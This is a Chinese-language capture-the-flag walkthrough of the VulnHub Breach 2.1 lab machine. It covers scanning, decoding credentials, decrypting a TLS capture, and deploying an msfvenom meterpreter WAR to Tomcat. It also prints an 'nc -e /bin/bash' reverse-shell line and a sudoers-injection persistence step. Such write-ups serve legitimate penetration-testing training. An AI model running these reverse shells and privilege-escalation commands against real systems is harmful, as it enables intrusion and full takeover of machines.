本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站，需要發現目標靶機的IP地址，可以使用nmap，netdiscover，或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的，那麼本次演示就是arp-scan工具發現

地址:https://www.vulnhub.com/entry/breach-21,159/

根據提示vulnhub官網提示，此靶機是固定IP地址，IP地址為：192.168.110.140

nmap -Pn -n -sS 192.168.110.140 --top-ports 100 -v --open -oA target_$(date "+%Y-%m-%d")

掃描結果發現開放了很多埠，首先看看80埠

沒多少資訊，右鍵檢視下目標的原始碼頁面

發現了base64編碼的資訊，我們解碼看看

經過兩次base64解碼得出賬戶和密碼

pgibbons:damnitfeel$goodtobeagang$ta 到這裡先放著，點選頁面的圖片看看，得到如下頁面

上面的每個頁面都點選看了下，發現有個Employee portal的登入介面視窗

輸入上面獲得的賬戶和密碼成功登入

檢視下Inbox資訊

發現一個目標web存在一個keystore，下載下來看看

確認是個java檔案， cat一下是亂碼，我們繼續在目標web上找有價值的資訊

這裡根據上述Inbox的提示資訊，上面獲得的keystore跟ssl有關，於是使用ssl關鍵字進行搜尋

點選看看

得到一個pcap的抓包檔案，我嘗試使用wireshark開啟，發現裡面是加密的資料包資訊，同時上面獲得此pcap的來源頁面上提示加密的pcap的資料包密碼是tomcat

這時候想到剛才獲得的keystore檔案，在kali環境下使用keytool工具進行解密，轉格式

keytool -exportcert -alias tomcat -file tomcat.der -keystore keystore

keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12

上述操作完成之後，最終獲得了兩個檔案，一個是keystore.p12 ， 另一個是 tomcat.der 其中keystore.p12是重要檔案，用作wireshark解密資料包，通過wireshark首選項找到TLS

然後點選編輯功能，新增資訊進行解密

這裡的IP地址是目標靶機的IP地址，埠是根據pcap的資料包資訊可以知道目標埠是8443，既然是解密web應用，那麼協議是http，key檔案就是剛剛上面獲得keystroe.p12 ，密碼是tomcat，操作完成之後即可解密，通過wireshark的http資料流檢視解密的http資訊

根據上述的http請求包，發現是採用的401認證，那麼這種認證使用的是base64編碼，我們是base64解碼即可，下面是通過burp進行解碼

tomcat:Tt\5D8F(#!*u=G)4m7zB

得到賬戶密碼之後，根據解密的http請求包中含有訪問的地址，嘗試去登入看看，地址：https://192.168.110.140:8443/_M@nag3Me/html 。這裡要注意，剛開始我訪問這個地址發現訪問不了，不管是firefox還是chrome都是訪問不了，然後telnet了下埠8443發現是通的，此時猜測可能是靶機較老，tls加密方式不安全，新版瀏覽器不支援，所以我通過使用burpsuite進行代理訪問目標

成功訪問之後，可以直接通過Deploy進行部署war來反彈shell，這裡也可以上傳jsp的webshell， 我這裡直接使用metasploit生成對於的war包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=4488 -f war -o manager.war

在kali中開啟msf並配置好payload進行監聽

開始上傳生成好的war包

上傳部署成功之後，然後訪問

此時成功在msf上反彈shell，檢視一下基本資訊

在這裡思路斷了一會，然後再回頭看看web，使用dirb命令目錄爆破下看看

發現了images目錄，訪問看看

每個照片都下載下來使用strings或者exiftool看看是否存在重要的提示和敏感資訊，最終發現，bill.png照片存在重要資訊，使用wget將其下載下來檢視，得到如下資訊

猜測這個有可能是跟使用者名稱密碼相關， 看看passwd

存在兩個使用者blumbergh,milton 使用上面獲得的資訊當作密碼去嘗試這兩個使用者，

最終確認這個密碼對應的使用者是blumbergh，在此賬戶下查看了如下一些資訊：

發現可以通過sudo進行提權，具體命令如下：

echo "nc -e /bin/bash 192.168.110.128 8443" > bmfx.txt
cat bmfx.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

然後kali本地監聽8443埠即可反彈shell；PS：這裡我使用上述方式發現不能成功反彈shell，期間換了不同的埠都不行，這裡先放著，我使用另一種方式提權；

=========================================================================================================================================================================

這裡我通過上面拿到的blumbergh的許可權查看了使用者milton的家目錄檔案，發現有mysql的歷史檔案資訊，猜測目標可能存在mysql服務，於是嘗試空口令登入MySQL資料庫，居然登入成功了

檢視資料庫使用者user的表資訊

發現使用者milton對應的加密密碼6450d89bd3aff1d893b85d3ad65d2ec2

解密得到密碼是thelaststraw，再次通過metasploit獲得的反彈shell使用su切換到使用者milton，切換之後使用nc 送一個shell到本地kali，然後配置為友好的tty-shell

這裡提權的重要操作是執行如下命令，然後促使目標靶機重啟

echo 'echo "milton ALL=(ALL) ALL" >> /etc/sudoers' > /etc/init.d/portly.sh

重啟系統再次進去目標靶機使用者milton之後執行sudo -l

看到上面資訊，那麼就可以確認是可以通過sudo -i進行提權